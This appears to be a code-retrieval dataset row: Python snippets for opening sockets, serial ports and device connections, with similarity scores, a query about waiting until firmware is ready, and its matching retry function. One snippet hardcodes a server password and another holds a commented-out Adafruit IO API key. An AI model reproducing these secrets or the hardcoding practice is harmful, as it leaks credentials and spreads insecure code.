"def initSocket(self):\n \n # Check WebSocket support\n if self.nodejs:\n try:\n WebSocket = require('ws') # does not work on Windows?\n #WebSocket = require('websocket').client\n except Exception:\n # Better error message\n raise \"FAIL: you need to 'npm install -g ws'.\"\n else:\n WebSocket = window.WebSocket\n if (window.WebSocket is undefined):\n document.body.innerHTML = 'This browser does not support WebSockets'\n raise \"FAIL: need websocket\"\n # Open web socket in binary mode\n self.ws = ws = WebSocket(flexx.ws_url)\n ws.binaryType = \"arraybuffer\"\n \n def on_ws_open(evt):\n console.info('Socket connected')\n def on_ws_message(evt):\n flexx.last_msg = evt.data or evt\n msg = flexx.decodeUtf8(flexx.last_msg)\n flexx.command(msg)\n def on_ws_close(evt):\n self.ws = None\n msg = 'Lost connection with server'\n if evt and evt.reason: # nodejs-ws does not have it?\n msg += ': %s (%i)' % (evt.reason, evt.code)\n if (not flexx.is_notebook) and (not self.nodejs):\n document.body.innerHTML = msg\n else:\n console.info(msg)\n def on_ws_error(self, evt):\n self.ws = None\n if flexx.is_notebook:\n console.error('Socket error: re-run flexx.app.init_socket() to connect.')\n else:\n console.error('Socket error')\n \n # Connect\n if self.nodejs:\n ws.on('open', on_ws_open)\n ws.on('message', on_ws_message)\n ws.on('close', on_ws_close)\n ws.on('error', on_ws_error)\n else:\n ws.onopen = on_ws_open\n ws.onmessage = on_ws_message\n ws.onclose = on_ws_close\n ws.onerror = on_ws_error",
"def __init__(self, host, server_port):\n\n # Set up the socket connection to the server\n self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n \n # TODO: Finish init process with necessary code\n self.host = host\n self.server_port = server_port\n self.run()",
"def __init__(self):\r\n self.client_socket = socket.socket() # the socket of the client.\r\n self.communicator = Communicator()\r\n self.events_handler = EventsHandler(self.client_socket)\r\n self.running = True\r\n self.display_resolution = DEFAULT_DISPLAY_RESOLUTION\r\n self.screen = self.get_display()",
"def __init__(self):\n self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.s.bind((socket.gethostname(), self.__SERVER_PORT))\n self.s.listen(5)\n print(\"<Server> Listening on {}:{}...\".format(socket.gethostname(), self.__SERVER_PORT))",
"def init_host(self):\n\n LOG.debug(_('XManager init_host...'))\n\n pass",
"def __init__(self, host=\"localhost\", port=60151, verbose=False):\n super(IGVSocketRobot, self).__init__(verbose=verbose)\n\n self.host = host\n self.port = port",
"def __init__(self, host, port=2345):\n self.host = host\n self.port = port\n self.set_command_list()",
"def init(config):\n ser_if = serial.Serial(config.serial_if, config.baud, timeout=config.timeout)\n sleep(1.6) # wait for serial port to be ready TODO: find a way to check\n return ser_if",
"def connect(self):\n try:\n # Port and packet handler set up\n self.port_handler = port_h.PortHandler(self.port_name)\n self.packet_handler = packet_h.PacketHandler(self.protocol_version)\n\n # Set up port and baud rate\n self.port_handler.openPort()\n self.port_handler.setBaudRate(self.baud_rate)\n self.__find_motors()\n except rospy.ROSInterruptException: pass\n\n self.running = True",
"def initSocket(self):\n \n # Check WebSocket support\n if self.nodejs:\n try:\n WebSocket = require('ws')\n except Exception:\n # Better error message\n raise \"FAIL: you need to 'npm install -g ws' (or 'websocket').\"\n else:\n WebSocket = window.WebSocket\n if (WebSocket is undefined):\n window.document.body.innerHTML = 'Browser does not support WebSockets'\n raise \"FAIL: need websocket\"\n # Open web socket in binary mode\n self.ws = ws = WebSocket(window.flexx.ws_url)\n #ws.binaryType = \"arraybuffer\" # would need utf-decoding -> slow\n \n def on_ws_open(evt):\n window.console.info('Socket connected')\n ws.send('hiflexx ' + flexx_session_id)\n def on_ws_message(evt):\n window.flexx.last_msg = msg = evt.data or evt\n #msg = window.flexx.decodeUtf8(msg)\n window.flexx.command(msg)\n def on_ws_close(evt):\n self.ws = None\n msg = 'Lost connection with server'\n if evt and evt.reason: # nodejs-ws does not have it?\n msg += ': %s (%i)' % (evt.reason, evt.code)\n if (not window.flexx.is_notebook) and (not self.nodejs):\n window.document.body.innerHTML = msg\n else:\n window.console.info(msg)\n def on_ws_error(self, evt):\n self.ws = None\n window.console.error('Socket error')\n \n # Connect\n if self.nodejs:\n ws.on('open', on_ws_open)\n ws.on('message', on_ws_message)\n ws.on('close', on_ws_close)\n ws.on('error', on_ws_error)\n else:\n ws.onopen = on_ws_open\n ws.onmessage = on_ws_message\n ws.onclose = on_ws_close\n ws.onerror = on_ws_error",
"def __init__(self, hostname, port, username, password, tenant_id, connect=True):\n self.cmd_gw_ws_api = HawkularWebsocketClient(\n url=\"ws://{}:{}/hawkular/command-gateway/ui/ws\".format(hostname, port),\n headers={\"Hawkular-Tenant\": tenant_id, \"Accept\": \"application/json\"},\n username=username, password=password)\n self.tenant_id = tenant_id\n if connect:\n self.cmd_gw_ws_api.connect()",
"def init(self):\n self.IP_ADDRESS = \"192.168.16.55\"\n self.PORT = 8888\n self.windFreakConnection = windFreakClient.ConnectionConstantFrequency(IP_ADDRESS=self.IP_ADDRESS, port=self.PORT) \n self.initialised=True\n return \"%s init successful\" % self.hardwareActionName",
"def __init__(self):\n self.host = socket.gethostname() # 192.168.56.1\n self.port = 33000\n self.buffer_size = 1024\n self.address = (self.host, self.port)",
"def __init__(self):\n super(TCPReader, self).__init__()\n\n self.host = config.get(\"HOST\")\n self.port = config.get(\"PORT\")\n self.listener = None\n\n # Thread Loop\n self.running = True\n\n # Report back to the main thread if we could bind to the port or not. Main thread will not continue\n # if port was not bound to.\n self.startup = threading.Event()\n self.startup_success = False",
"def init_conn(self):\n \n SERVER_ADDRESS = '192.168.0.21'\n PORT = 8018\n SERVER_PASSWORD = \"biratkingofcomedy\" \n connected = False\n \n # check if test module is being run\n if self.testing == 'n': \n while not connected:\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n \n try:\n self.socket.connect((SERVER_ADDRESS, PORT))\n \n # server verification\n self.socket.sendall(self.make_packet(\"DATA\", SERVER_PASSWORD))\n \n response = self.socket.recv(4096)\n \n if response:\n response_hdr, response_msg, response_sdr = self.parse_packet(response)\n \n if response_hdr == \"ERROR\" and response_msg == \"IDENTIFY FAILED\":\n raise Exception(\"PASSWORD FAIL\")\n \n elif response_hdr == \"DATA\" and response_msg == \"CONNECTED\":\n connected = True\n \n else:\n raise Exception(\"CONNECTION FAIL\") \n \n except Exception as e:\n if e == \"PASSWORD FAIL\":\n print(\"DEBUG: server connection failed (invalid credentials)\")\n print(\"DEBUG: quitting\")\n break\n \n else:\n print(e)\n print(\"DEBUG: server connection failed (could not connect), trying again in 10s\")\n time.sleep(10)\n \n else:\n print(\"DEBUG: socket setup skipped\")",
"def start(self):\n self.protocol.makeConnection(self.transport)",
"def start(self):\n self.protocol.makeConnection(self.transport)",
"def comInit(self, port):\n if DEBUG > 1: sys.stderr.write(\"* comInit()\\n\")\n self.seqNo = 0\n self.reqNo = 0\n self.rxPtr = 0\n self.txPtr = 0\n # Startup-Baudrate: 9600,8,E,1, 1s timeout\n self.serialport = serial.Serial(\n port,\n 9600,\n parity = serial.PARITY_EVEN,\n timeout = self.timeout\n )\n if DEBUG: sys.stderr.write(\"using serial port %r\\n\" % self.serialport.portstr)\n #self.SetRSTpin() #enable power\n #self.SetTESTpin() #enable power\n self.serialport.flushInput()\n self.serialport.flushOutput()",
"def connect():",
"def __init__(self):\n self._server = None\n self._address = \"\"\n self._port = 0",
"def connect(self):\n self.ws.connect()",
"def __init__(self):\n self.host = CONF.zvm.zvm_xcat_server\n self.port = 443\n self.conn = HTTPSClientAuthConnection(self.host, self.port,\n CONF.zvm.zvm_xcat_ca_file,\n timeout=CONF.zvm.zvm_xcat_connection_timeout)",
"def connect(self):\n if (self.Type == \"SERIAL\"):\n if (self.Port== None):\n raise self.ErrorNoPortDefined(\"Can't connect, no serial port defined.\")\n elif self.State!=0:\n raise self.ErrorAlreadyConnected(\"Can't connect, already connected.\")\n else:\n #try:\n self.Port.open()\n self.State = 1\n time.sleep(0.5)\n #self.SERIAL_SEND_cmd( ' ' )\n #self.flush_recv_buf()\n self.SERIAL_FLUSH_buffers()\n time.sleep(0.5)\n self.SERIAL_SEND_cmd( ' ' )\n time.sleep(0.5)\n self.SERIAL_FLUSH_buffers()\n if self.debug > 1:\n print \"Trying to send reset command...\"\n self.reset()\n time.sleep(0.5)\n # reset protocol to auto\n self.reset_protocol()\n time.sleep(0.5)\n # report what protocol was discovered\n self.rtrv_attr()\n #except serial.SerialException as inst:\n # self.State = 0\n # raise inst\n elif (self.Type == \"FILE\"):\n print \"Nothing to do.. not a serial port...\"\n pass",
"def __init__(self, host, port):\n self.host = host\n self.port = port",
"def __init__(self, host, port):\n self.host = host\n self.port = port",
"def start(self):\n\n address = (socket.gethostbyname(self.hostname), self.port)\n logger.info(\"Connecting to %r\" % (address,))\n self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self._socket.connect(address)\n self._start_processors()\n return self",
"def __init__(self):\n\n # For now, we'll connect to the target via the Apollo debug controller.\n # This should be replaced by a high-speed USB link soon; but for now\n # we'll use the slow debug connection.\n self._debugger = ApolloDebugger()\n self._serial = self._find_serial_connection()",
"def __init__(self):\n self.host = None\n self.port = None\n self.topic = None\n self._is_opened = False\n self.debug = 0\n self.qos = 0\n self.mqttc = mqtt.Client(\"sng_mqtt\")",
"def open(self):\n self.device = ConnectHandler(\n device_type='vyos',\n host=self.hostname,\n username=self.username,\n password=self.password,\n timeout=self.timeout,\n port=self.port\n )",
"def __init__(self, *args, **kwargs):\n self.args = args\n self.kwargs = kwargs\n\n config = kwargs.get(\"config\", kwargs)\n self.connection_type = config.get(\"connection_type\", None)\n self.connection = connection_decider.connection(device=self,\n conn_type=self.connection_type,\n **kwargs)\n self.connection.connect()\n self.consoles = [self]\n super(PrplMeshStation, self).__init__(*args, **kwargs)\n self.iface_dut = self.iface_wifi = self.kwargs.get(\n 'iface', 'wlan0')\n self.driver_name = config.get(\"driver\", \"nl80211,wext\")\n self.mac = self.get_mac()\n\n # kill all wpa_supplicant relevant to active interface\n self.wifi_disconnect()\n # Turn on and off wlan iface just in case\n self.disable_and_enable_wifi()",
"def initialize(self):\n LOGGER.info('Set %d initializing...', self.port_set)\n # There is a race condition here with ovs assigning ports, so wait a bit.\n time.sleep(2)\n shutil.rmtree(self.tmpdir, ignore_errors=True)\n networking_name = 'gw%02d' % self.port_set\n networking_port = self.pri_base + self.NETWORKING_OFFSET\n LOGGER.debug(\"Adding networking host on port %d\", networking_port)\n cls = docker_host.make_docker_host('daq/networking', prefix='daq', network='bridge')\n try:\n self.networking = self.runner.add_host(networking_name, port=networking_port,\n cls=cls, tmpdir=self.tmpdir)\n self._create_config(self.networking.tmpdir)\n self.record_result('startup')\n except Exception as e:\n self._state_transition(_STATE.ERROR)\n self.record_result('startup', exception=e)",
"def connect(self):\n\n self.openstack = connection.Connection(auth_url=self.args.OS_AUTH_URL,\n project_name=self.args.OS_TENANT,\n username=self.args.OS_USER,\n password=self.args.OS_PASS)\n\n self.scaleio = SIOWrapper(self.args.SIO_GATEWAY,\n self.args.SIO_PORT,\n self.args.SIO_USER,\n self.args.SIO_PASS)",
"def init_host(self, host):\n LOG.debug(\"init_host\")",
"def __init__(self,\n host,\n username,\n password,\n port=443,\n path='/wsman',\n protocol='https'):\n super(DRACClient, self).__init__(host,\n username,\n password,\n port,\n path,\n protocol)\n self._job_mgmt = job.JobManagement(self.client)\n self._idrac_cfg = idrac_card.iDRACCardConfiguration(self.client)\n self._nic_cfg = nic.NICConfiguration(self.client)\n self._nic_mgmt = nic.NICManagement(self.client)",
"def __init__(self, proj,LocalIP,ListenerPort,BroadcasterIP,BroadcasterPort):\n\n\n # Get connection settings from robot configuration file\n ipIn = LocalIP # IP address (string)\n portIn = ListenerPort # Port (number)\n ipOut = BroadcasterIP # IP address (string)\n portOut = BroadcasterPort # Port (number)\n try:\n # Create proxies to access modules\n self.robocomm = _RobotCommunicator()\n self.robocomm.start()\n time.sleep(1) # Give communicator time to start and receive first data\n except RuntimeError:\n print \"(INIT) ERROR: Cannot connect to the robot.\"\n exit(-1)",
"def connect(self):\n self.sock = s.socket(s.AF_INET,s.SOCK_STREAM)\n self.sock.connect((self.remote_host,\n self.remote_port))",
"def __init__(self, ip, port, header):\n \n self.header = header\n self.ip = ip\n self.port = port\n try:\n self._connect_socket()\n except socket.error as e:\n print(e)\n self.close_and_exit()",
"def __init__(self):\n self._process = None\n self._nm = PortScanner()",
"def _connect(self):\n #print(\"Connecting...\")\n self._connection = reactor.connectTCP(self.host, self.port, self.factory) #@UndefinedVariable",
"def connect(self):\n print(\"Connecting\")\n self.socket.connect((self.ip, self.port))\n self.startReading()",
"def __init__(self, host, port, driver, connection_string, password=\"\", use_ssl=False):\n self._socket = socket.create_connection((host, port))\n if use_ssl:\n self._socket = ssl.wrap_socket(self._socket)\n\n self._pass = password\n self._driver = driver\n self._connection_string = connection_string\n self._id = 1",
"def connect(self):\n self.conn.connect()",
"def __init__(self, PORT):\n self.server.bind(('0.0.0.0', PORT))\n self.server.listen(10000)\n self.clients = []\n self.rooms = []\n self.aceptarClientes = True",
"def init(self, HOST, PORT, BACKLOG):\n s = socket(AF_INET, SOCK_STREAM)\n s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\n #s.setblocking(0)\n s.bind((HOST, PORT))\n s.listen(BACKLOG)\n # Add socket to list of available inputs\n self.server = s\n self.inputs.append(s)\n self.log(\"Bound socket to port: %s\", PORT)\n self.log(\"Sequence initialized to: %s\", self.seqNum)",
"def __init__(self):\n super().__init__()\n self.port_end = PortTerminator()",
"def init(self):\n\n pygame.init()\n pygame.display.set_mode((640, 480))\n pygame.display.set_caption(\"Gears 4 Geeks\")\n pygame.joystick.init()\n self.controller = pygame.joystick.Joystick(0)\n self.controller.init()\n self.ser = serial.Serial('COM4', 9600)\n\n #ADAFRUIT_IO_KEY = 'd1a1bd3737714fa488e0364c775a4b4d' ##This will only be good until the end of the competition\n #self.aio = Client(ADAFRUIT_IO_KEY)",
"def __init__(self, worker_id=0,\n base_port=5005):\n self.port = base_port + worker_id\n self.worker_id = worker_id\n self.server = None\n self.unity_to_external = None\n self.is_open = False",
"def _setup_communication(self):\n state = self.ui.checkBox_comm.checkState()\n if state:\n try:\n sys.path.append(\"..\")\n from zmq_interface.gui_interface import ZmqInterface\n except ImportError as e:\n self.write_text(\"ZMQ interface failed to import. No remote control for this session.\")\n self.disable_visualizer()\n return\n try:\n ##TODO: let user specify ports\n self.com = ZmqInterface(rep_port=REPLY_PORT,\n gui_handle=self)\n except Exception as e:\n #traceback.print_exc(file=sys.stdout)\n self.write_text(\"ZMQ interface failed to start. No remote control for this session. Reason: %s\" % e)\n self.disable_visualizer()\n return\n self.start = self._start_session\n self.stop = self._stop_session\n self.load_config = self._load_state\n self.save_config = self._save_state\n self.com_timer = QtCore.QTimer()\n self.com_timer.timeout.connect(self._check_coms)\n self.com_timer.start(200)\n self.write_text(\"ZMQ interface set up. Reply port on %s\" % self.com.rep_port)\n self.enable_visualizer()\n else:\n if self.com:\n self.com.close()\n if self.com_timer:\n self.com_timer.stop()\n self.com = None\n self.com_timer = None\n self.enable_visualizer()\n self.write_text(\"ZMQ interface closed.\")",
"def connect(self):\n logging.info(\"Cam.py: connecting components\")\n self.serv = pyrs.Service()\n self.dev = self.serv.Device(device_id=0, \n streams=[\\\n pyrs.stream.DepthStream(fps=60), pyrs.stream.ColorStream(fps=60)])",
"def __init__(self, connectionParams) :\n self.ssh = None\n self.connected = False\n self.connObj = connectionParams",
"def connect(self):\n \n try:\n self.__sock.connect((self.__host, self.__port))\n\n except socket.error,e:\n print 'Oops, unable to connect. Try again!',e\n sys.exit(1)",
"def __init__(self, ip, port):\n hwEscpos.EscposDriver.__init__(self)\n self.ip = ip\n self.port = int(port)",
"def connect(self):\n # open serial port\n try:\n #device = self.get_device_name(self.serial_number)\n device = \"/dev/ttyAMA0\"\n self.serial.port = device\n # Set RTS line to low logic level\n self.serial.rts = False\n self.serial.open()\n except Exception as ex:\n self.handle_serial_error(ex)",
"def init_box():\n # Find MAC and IP address\n ip_address = ni.ifaddresses(INTERFACE)[ni.AF_INET][0]['addr']\n mac_address = ni.ifaddresses(INTERFACE)[ni.AF_LINK][0]['addr']\n conn_results = utils.test_connections()\n logging.info(\"Connection test results: %s \\n\", str(conn_results))\n start_port, free_ports = utils.connection_results_2_free_ports(conn_results)\n resp, err = call_init(mac_address, ip_address, start_port, free_ports)\n if err:\n logging.error(\"Failed to connect to SCION-COORD server: \\n %s \\n\",err)\n exit(1)\n elif resp.status_code == 200:\n if resp.headers['content-type'] == 'application/json; charset=utf-8':\n # We have received the list of potential neighbors\n dict = json.loads(resp.content.decode('utf8').replace(\"'\", '\"'))\n utils.save_credentials(dict)\n logging.info(\"Received list of potential neighbors and credentials from SCION-COORD: %s \", str(dict))\n if not dict[\"PotentialNeighbors\"]:\n logging.info(\"no potential Neighbors !\")\n exit(1)\n connection_results = test_links(dict[\"PotentialNeighbors\"])\n dict[\"PotentialNeighbors\"] = connection_results\n connect_box(dict)\n elif resp.headers['content-type'] == 'application/gzip':\n logging.info(\"Received gen folder \")\n utils.parse_response(resp)\n logging.info(\"Starting SCION !\")\n utils.start_scion()\n else:\n # Received something else\n # TODO UPDATE ?\n pass\n else:\n logging.error(\"[ERROR] Wrong status code %s\", resp.status_code)\n exit(1)",
"def init(self):\n self.reset()\n\n self.__interface.send_command('POWER_SETTING')\n self.__interface.send_data(0x37)\n self.__interface.send_data(0x00)\n\n self.__interface.send_command('PANEL_SETTING')\n self.__interface.send_data(0xCF)\n self.__interface.send_data(0x08)\n\n self.__interface.send_command('BOOSTER_SOFT_START')\n self.__interface.send_data(0xc7)\n self.__interface.send_data(0xcc)\n self.__interface.send_data(0x28)\n\n self.__interface.send_command('POWER_ON')\n self.wait_until_idle()\n\n self.__interface.send_command('PLL_CONTROL')\n self.__interface.send_data(0x3c)\n\n self.__interface.send_command('TEMPERATURE_CALIBRATION')\n self.__interface.send_data(0x00)\n\n self.__interface.send_command('VCOM_AND_DATA_INTERVAL_SETTING')\n self.__interface.send_data(0x77)\n\n self.__interface.send_command('TCON_SETTING')\n self.__interface.send_data(0x22)\n\n self.__interface.send_command('TCON_RESOLUTION')\n self.__interface.send_data(0x02) #source 640\n self.__interface.send_data(0x80)\n self.__interface.send_data(0x01) #gate 384\n self.__interface.send_data(0x80)\n\n self.__interface.send_command('VCM_DC_SETTING')\n self.__interface.send_data(0x1E) #decide by LUT file\n\n self.__interface.send_command(0xe5, False) #FLASH MODE\n self.__interface.send_data(0x03)",
"def init(self, address, port):\n \n pygame.init()\n pygame.joystick.init()\n self.controller = pygame.joystick.Joystick(0)\n self.controller.init()\n self.event_dict = {}\n\n # Create a TCP/IP socket\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n # Connect the socket to the port where the server is listening\n server_address = (address, port)\n print('connecting to {} port {}'.format(address, port))\n self.sock.connect(server_address)\n self.axis_data = {i:0 for i in range(7)}\n self.verbose = True",
"def createConnectionToCli(self):\n connected = False\n # loop until connected\n while not connected:\n try:\n self.dataClient = Client(\n ('localhost', 5000), authkey=b'secret password')\n connected = True\n except ConnectionRefusedError:\n pass\n\n self.logger.debug('Connected to Process!')",
"def __init__(self, address=\"lex\", port=8000, **kwargs):\n self.connect(address, port)",
"def connect(self):\n self.socket.connect(f'tcp://{self.ip}:{self.port}')\n self.socket.send_string('PUB_PORT')\n self.pub_port = self.socket.recv_string()\n self.pub_socket = zmq.Socket(self.ctx, zmq.PUB)\n self.pub_socket.connect(f\"tcp://{self.ip}:{self.pub_port}\")",
"def init(self):\n self.AOMBoxConnection = pyArdDAC.ARD_DAC(HOST=self.AOMBox_IP, PORT=8888, DEBUG=False)#connects to arduino in High frequency Na AOM box\n #channel number should be defined in subclass\n self.INTEGER_MIN = 0\n self.INTEGER_MAX = 65535\n self.VOLTAGE_MIN = 0.0\n self.VOLTAGE_MAX = 5.0\n self.initialised=True\n return \"%s init successful\" % self.hardwareActionName",
"def __init__(self, ip, port):\n self.port = port\n self.srvsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.srvsock.connect((ip, port))\n self.thread_receive = threading.Thread(target=self.receive_msg)\n self.thread_send = threading.Thread(target=self.send_msg)\n self.t = blessings.Terminal()\n self.th = self.t.height\n self.tw = self.t.width\n self.k = 1\n self.flag = True\n os.system('clear')",
"def _connect(self):\n hostport = self.getHost()\n channelOpenData = forwarding.packOpen_direct_tcpip((self.host, self.port), (hostport.host, hostport.port))\n self.connector.connection.openChannel(self, channelOpenData)",
"def connect(self):\n from labrad.wrappers import connectAsync\n self.cxn = yield connectAsync(name='Protection_Beam_Server')\n self.arduino = self.cxn.arduinottl\n self.pmt = self.cxn.normalpmtflow\n self.enable_protection_shutter(self, self.enable_shutter)\n self.setupListeners()",
"def __init__(self, port1, port2, port3):\n # Initialise ports\n self.ports = {\n \"English\": int(port1),\n \"Te reo Maori\": int(port2),\n \"German\": int(port3)\n }\n\n # Initialise sockets\n self.english_sc = None\n self.maori_sc = None\n self.german_sc = None",
"def init_serial(instrument):\r\n\t# open a serial port\r\n\ttry:\r\n\t\tser = serial.Serial(instrument['port']) # try and open th serial port\r\n\texcept:\r\n\t\tser = serial.Serial() # make an empty serial port object if not\r\n\t# display serial port status\r\n\tprint_spacer()\r\n\tif ser.isOpen()==True:\r\n\t print 'Serial port '+instrument['port']+ ' has been opened.'\r\n\telse:\r\n\t print 'Serial port '+instrument['port']+' failed to open.'\t\t# set up the parameters\r\n\t# set up the serial port parameters\r\n\tser.baudrate = instrument['baudrate'] # set the baudrate\r\n\tser.bytesize = instrument['bytesize'] # \r\n\tser.parity = instrument['parity'] # \r\n\tser.stopbits = instrument['stopbits'] # \r\n\tser.timeout = instrument['timeout'] # specify a timeout (in seconds) so the port doesn't hang\r\n\tser.xonxoff = instrument['xonxoff'] # \r\n\tser.rtscts = instrument['rtscts'] # \r\n\tser.dsrdtr = instrument['dsrdtr'] # \r\n\t#return the serial port back to the caller\r\n\treturn ser",
"def __init__(self, host: str, username: str, password: str, secret=\"\", port=22, **kwargs): # nosec\n super().__init__(host, username, password, device_type=\"cisco_asa_ssh\")\n\n self.native: Optional[CiscoAsaSSH] = None\n self.secret = secret\n self.port = int(port)\n self.kwargs = kwargs\n self.global_delay_factor: int = kwargs.get(\"global_delay_factor\", 1)\n self.delay_factor: int = kwargs.get(\"delay_factor\", 1)\n self._connected = False\n self.open()\n self._peer_device: Optional[ASADevice] = None\n log.init(host=host)",
"def __init__(self,\n host_name='127.0.0.1',\n port=ControlServer.CONTROL_PORT):\n\n self._socket = QtNetwork.QTcpSocket()\n self._socket.connected.connect(self._connected)\n self._socket.disconnected.connect(self._disconnected)\n self.connected = False\n self._socket.connectToHost(host_name, port)",
"def initialize_socket(self):\n try:\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.sock.bind((self.host, self.port))\n self.sock.listen(10)\n except socket.error, (value, message):\n if self.sock:\n self.sock.close()\n # TODO: LOG and provide means for graceful failure\n print \"Unable to open socket: \" + message\n print \"Error value: \" + str(value)",
"def _initRemoteMDSConnection(shotno):\n\tconn = _mds.Connection(_pref._HBT_SERVER_ADDRESS+':8003');\n\tconn.openTree('hbtep2', shotno);\n\treturn conn",
"def __init__(self, creator_socket):\n self.__socket = creator_socket\n logger.info(BUNDY_SOCKCREATOR_INIT)",
"def connect(self):\n self.arduino = Serial(self.port, self.baud_rate, timeout=self.timeout)",
"def _connect(self):\n try:\n #print(\"try to connect _connect\")\n sock = gevent.socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.connect(self.remote_address)\n except socket.error as error:\n logger.warning(\"Couldn't connect to %s: %s.\",\n self._repr_remote(), error)\n else:\n self.initialize(sock, self.remote_service_coord)",
"def __init__(self,address = None):\n\t\t# I really should do some validation around here\n\t\n\t\tif address != None:\n\t\t\tself.connect(address)"
] | [
"0.68135244",
"0.6722893",
"0.6576823",
"0.6545895",
"0.644708",
"0.6422418",
"0.63781244",
"0.6336236",
"0.632813",
"0.6293881",
"0.6287817",
"0.6272204",
"0.6263622",
"0.6260987",
"0.62608707",
"0.6248125",
"0.6230067",
"0.6226806",
"0.6222727",
"0.6207892",
"0.6204479",
"0.6199098",
"0.61818177",
"0.6169914",
"0.6168168",
"0.61630803",
"0.6162961",
"0.61409026",
"0.6126866",
"0.6112256",
"0.61062515",
"0.6073524",
"0.60677",
"0.6061262",
"0.6059762",
"0.6028337",
"0.6024558",
"0.60215425",
"0.601498",
"0.6010289",
"0.60101825",
"0.59934336",
"0.59854686",
"0.5985429",
"0.5985429",
"0.59851086",
"0.598078",
"0.59786874",
"0.5978631",
"0.59782356",
"0.5976034",
"0.5973603",
"0.5973603",
"0.59727514",
"0.5968348",
"0.5967893",
"0.59605783",
"0.59595907",
"0.5958674",
"0.59520376",
"0.59488255",
"0.5939047",
"0.59375226",
"0.59254676",
"0.5925427",
"0.5918987",
"0.59153044",
"0.591378",
"0.59050053",
"0.5903733",
"0.5897043",
"0.5893201",
"0.58861524",
"0.5883788",
"0.58821064",
"0.5875777",
"0.5872845",
"0.5863558",
"0.5859377",
"0.5856732",
"0.5855701",
"0.58420295",
"0.5839088",
"0.58371043",
"0.5827849",
"0.5826972",
"0.58252144",
"0.5824248",
"0.5821275",
"0.58201504",
"0.58197594",
"0.5818745",
"0.5811872",
"0.5810854",
"0.58096266",
"0.580762",
"0.58065015",
"0.5806096",
"0.5806047",
"0.5805189",
"0.58035564"
] | 0.0 | -1 |
ready_for_commands is a function to wait for the firmware to be ready to communicate | def ready_for_commands(self, retries = 3):
    # Keep the last caught exception so it can be re-raised once all retries are used up.
    last_error = None
    while retries:
        try:
            self.refresh()
            return True
        except Reset_Exception as e:
            last_error = e
        except Max_Retry_Exception as e:
            last_error = e
        finally:
            retries -= 1
    raise last_error | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def _wait_ready(self):\n command = self._recv_from_client()\n while command != \"READY\":\n command = self._client.recv_from_client()",
"def waitonready(self):\n debug('ControllerStartup.waitonready()')\n waitonready(self.pidevice, **self._kwargs)",
"def waitonready(pidevice, timeout=300, predelay=0, polldelay=0.1):\n if not isdeviceavailable([GCS2Commands, GCS21Commands], pidevice):\n raise TypeError('Type %s of pidevice is not supported!' % type(pidevice).__name__)\n\n sleep(predelay)\n if not pidevice.HasIsControllerReady():\n return\n maxtime = time() + timeout\n while not pidevice.IsControllerReady():\n if time() > maxtime:\n raise SystemError('waitonready() timed out after %.1f seconds' % timeout)\n sleep(polldelay)\n pidevice.checkerror()",
"def _wait_for_ready(self):\n if not self._ready:\n self.expect(self._terminal_ready_str, timeout=15)\n self._ready = True\n return self",
"def wait_until_ready(self):\n while not self.is_ready():\n time.sleep(0.01)",
"def run_setup_commands(self):\n if not hasattr(self, 'commands') or not self.commands:\n return\n print('{GREEN}Running setup commands...{NC}'.format(**colors))\n for c in self.commands:\n self.mqtt.connect(self.mqtt_host)\n command = \"{c_topic}/{cmnd}\".format(**self, cmnd=c['command'])\n payload = ''\n if 'concat' in c: #It's a set of rules; so do fancy shit\n payload = ' '.join(c['concat'])\n else: #payload is the correct thing\n payload=c['payload']\n print(\"Sending {c} {p}\".format(c=command, p=payload))\n self.mqtt.publish(command, payload)\n self.mqtt.disconnect()\n sleep(1)\n if \"restart\" in c and c['restart'] == 1:\n self.online_check()",
"async def wait_until_ready(self):\n await self._ready.wait()",
"def check_commands(self):\n self.check_subsystem_commands()\n self._select_mode()",
"def wait_all_ml_ready():\n ready_dict = recv_from_all_ml(to_wait = False)\n\n # Wait the ready command one by one\n for ml_process, received_msg in ready_dict.items():\n while received_msg != \"READY\":\n received_msg = recv_from_ml(ml_process, to_wait = True)",
"async def wait_until_ready(self) -> None:\n await self._ready.wait()",
"def wait_to_be_ready(self):\n count = 0\n while count < 6:\n try:\n line = self.stdout_reader.get(timeout=10)\n if \"waiting for input\" in line:\n self.cec_logger.info('CEC is ready')\n break\n except Empty:\n self.cec_logger.warning(\"haven't received a line from CEC\")\n count += 3",
"def check_subsystem_commands(self):\n self.communications.check_controls()\n self.__check_video()\n self.__check_picture()\n self.__check_ping()\n self.__check_motion()",
"def on(self):\n\t\trb0 = [0x00]\n\t\trb1 = [0x00, 0x00]\n\t\tattempts = 0\n\n\t\twhile self.state != ON and attempts < MAX_RETRIES:\n\t\t\tself.spi.transfer([0x03], rb0, 1)\t\t## Send the command byte; response will be written to rb0\n\t\t\ttime.sleep(9e-3) \t\t\t\t\t\t## Sleep for 9 ms\n\t\t\tself.spi.transfer([0x00, 0x01], rb1, 2)\t## Send the following 2 bytes; response will be written to rb1\n\t\t\ttime.sleep(0.1)\n\n\t\t\tif rb0[0] < 0: \t\t\t\t\t\t## Account for implicit unsigned-to-signed \n\t\t\t\trb0[0] += 256\t\t\t\t\t## conversion from the transfer operation\n\n\t\t\tattempts += 1\n\t\t\tprint(f\"[{self.__class__.__name__}::on]\", end=' ')\n\t\t\tif rb0[0] == 0xF3 and rb1[0] == 0x03: \t## Ensure response values are as expected\n\t\t\t\tself.state = ON \n\t\t\t\tprint(\"SUCCESS -- device powered on.\")\n\t\t\telse:\n\t\t\t\tif attempts != MAX_RETRIES:\n\t\t\t\t\tprint(f\"Attempt #{attempts} failed -- retrying after delay ...\")\n\t\t\t\t\ttime.sleep(RETRY_DELAY)\n\t\t\t\telse:\n\t\t\t\t\tprint(\"ERROR -- command failed.\")\n\n\t\treturn self.state == ON",
